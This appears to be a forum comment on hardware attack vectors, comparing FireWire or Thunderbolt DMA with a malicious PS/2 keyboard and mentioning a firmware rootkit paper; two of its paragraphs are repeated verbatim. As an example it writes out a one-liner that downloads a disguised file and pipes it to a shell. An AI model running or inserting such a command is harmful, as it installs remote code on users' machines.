DMA via FireWire (or Thunderbolt or similar) allows you to very quickly poke at system memory with a near-zero risk of being detected.
An autonomously malicious PS/2 keyboard, on the other hand, is on the end of a slow (~12 kbit/s) serial interface. It can only simulate keypresses and receive updates about the keyboard LEDs' statuses. It doesn't know the current state of the system. It's as likely to type "curl http://innocent-looking.org/logo.jpg|sh" in a text editor as it is at a command prompt, so it can't type anything autonomously without running the (huge) risk of alerting its owner to its presence.
Edit: The "Reversing and exploiting an Apple firmware update" paper linked below talks about persisting a rootkit on a computer by using Spotlight to open Terminal, then typing a command to download and execute a payload. That runs the same risk of alerting the user to its presence, and it will completely fail if the user has remapped Cmd-Space to something else.
An autonomously malicious PS/2 keyboard, on the other hand, is on the end of a slow (~12 kbit/s) serial interface. It can only simulate keypresses and receive updates about the keyboard LEDs' statuses. It doesn't know the current state of the system. It's as likely to type "curl http://innocent-looking.org/logo.jpg|sh" in a text editor as it is at a command prompt, so it can't type anything autonomously without running the (huge) risk of alerting its owner to its presence.
Edit: The "Reversing and exploiting an Apple firmware update" paper linked below talks about persisting a rootkit on a computer by using Spotlight to open Terminal, then typing a command to download and execute a payload. That runs the same risk of alerting the user to its presence, and it will completely fail if the user has remapped Cmd-Space to something else.